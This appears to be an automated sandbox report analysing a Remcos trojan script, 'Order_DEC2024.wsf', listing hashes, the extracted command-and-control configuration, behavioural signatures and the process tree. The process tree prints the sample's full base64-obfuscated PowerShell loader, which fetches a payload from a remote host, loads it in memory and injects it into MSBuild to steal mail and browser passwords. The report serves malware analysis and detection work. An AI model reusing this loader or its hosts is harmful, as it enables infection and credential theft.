Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04/12/2024, 14:23
Static task
static1
Behavioral task
behavioral1
Sample
Order_DEC2024.wsf
Resource
win7-20241023-en
General
-
Target
Order_DEC2024.wsf
-
Size
3KB
-
MD5
c209a2bdfa9028df5da14abdc1fc58ce
-
SHA1
17b2e2192cccdde3bc51197285ccdc5a0dc80587
-
SHA256
a2e71163d56c1feb4714e20d8b559bcf005e10b9044d9565afa0e257b0eb4d62
-
SHA512
0d7a39070b32d140bfcf01f125eea94d9016d0e641e461d1d2a8d0b42d5d0cc8388fccc1c08272ed09bde710cbd4154b281e638b9f608e7e0b344d6aa3bd54c9
Malware Config
Extracted
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
Extracted
remcos
4
lewisham1122.ddnsking.com:6426
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-L31JDJ
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/668-42-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/2220-44-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/3456-43-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/668-42-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/3456-43-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 4 IoCs
flow pid Process 2 4576 WScript.exe 5 4576 WScript.exe 19 3236 powershell.exe 24 3236 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts MSBuild.exe -
pid Process 3236 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3236 set thread context of 1780 3236 powershell.exe 88 PID 1780 set thread context of 3456 1780 MSBuild.exe 93 PID 1780 set thread context of 668 1780 MSBuild.exe 94 PID 1780 set thread context of 2220 1780 MSBuild.exe 95 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 5 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3236 powershell.exe 3236 powershell.exe 3456 MSBuild.exe 3456 MSBuild.exe 2220 MSBuild.exe 2220 MSBuild.exe 3456 MSBuild.exe 3456 MSBuild.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1780 MSBuild.exe 1780 MSBuild.exe 1780 MSBuild.exe 1780 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3236 powershell.exe Token: SeDebugPrivilege 2220 MSBuild.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1780 MSBuild.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 4576 wrote to memory of 3236 4576 WScript.exe 82 PID 4576 wrote to memory of 3236 4576 WScript.exe 82 PID 3236 wrote to memory of 1780 3236 powershell.exe 88 PID 3236 wrote to memory of 1780 3236 powershell.exe 88 PID 3236 wrote to memory of 1780 3236 powershell.exe 88 PID 3236 wrote to memory of 1780 3236 powershell.exe 88 PID 3236 wrote to memory of 1780 3236 powershell.exe 88 PID 3236 wrote to memory of 1780 3236 powershell.exe 88 PID 3236 wrote to memory of 1780 3236 powershell.exe 88 PID 3236 wrote to memory of 1780 3236 powershell.exe 88 PID 3236 wrote to memory of 1780 3236 powershell.exe 88 PID 3236 wrote to memory of 1780 3236 powershell.exe 88 PID 1780 wrote to memory of 4160 1780 MSBuild.exe 92 PID 1780 wrote to memory of 4160 1780 MSBuild.exe 92 PID 1780 wrote to memory of 4160 1780 MSBuild.exe 92 PID 1780 wrote to memory of 3456 1780 MSBuild.exe 93 PID 1780 wrote to memory of 3456 1780 MSBuild.exe 93 PID 1780 wrote to memory of 3456 1780 MSBuild.exe 93 PID 1780 wrote to memory of 3456 1780 MSBuild.exe 93 PID 1780 wrote to memory of 668 1780 MSBuild.exe 94 PID 1780 wrote to memory of 668 1780 MSBuild.exe 94 PID 1780 wrote to memory of 668 1780 MSBuild.exe 94 PID 1780 wrote to memory of 668 1780 MSBuild.exe 94 PID 1780 wrote to memory of 2220 1780 MSBuild.exe 95 PID 1780 wrote to memory of 2220 1780 MSBuild.exe 95 PID 1780 wrote to memory of 2220 1780 MSBuild.exe 95 PID 1780 wrote to memory of 2220 1780 MSBuild.exe 95
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Order_DEC2024.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumar2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\pipwiontuv"4⤵PID:4160
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\pipwiontuv"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3456
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\rkcpigyvidywg"4⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:668
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\Admin\AppData\Local\Temp\cehajzjpwlqjinfd"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5edfcbfdc0f8193c7fb706578d8515a37
SHA14c653cb46959b58d047881824da405b6b8410162
SHA256092f5630ed874bb2ca75695e352fa9212eeeb4cf76c5993bcae6dedd23d2f4fc
SHA512a42d1c152e5a0feb6f433ae3a8fe875acc74463f0fcca09d4000992e9dcf4bd6cfff1cd7a722c396b6c8dbadea653abd671581b20cdeb0640c8f4c6b5cc95fa7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD57aca43b2800ceb18b3ed2326532545de
SHA1d4cf207ef85bd749d59c1cb27a09c167ee21523a
SHA2563d9f8622d97587fd84d3d0560a50ab38e5f894fe4b5bcaa34279643fdaaeb480
SHA5120e002e6b8d965c227d9b1aa7c0251619c787ec7717e59667e756e5815e3666a955ea397eb148a1ed6bb7d8045727e4efa656a103f14bc70a03b03f0c91283c2f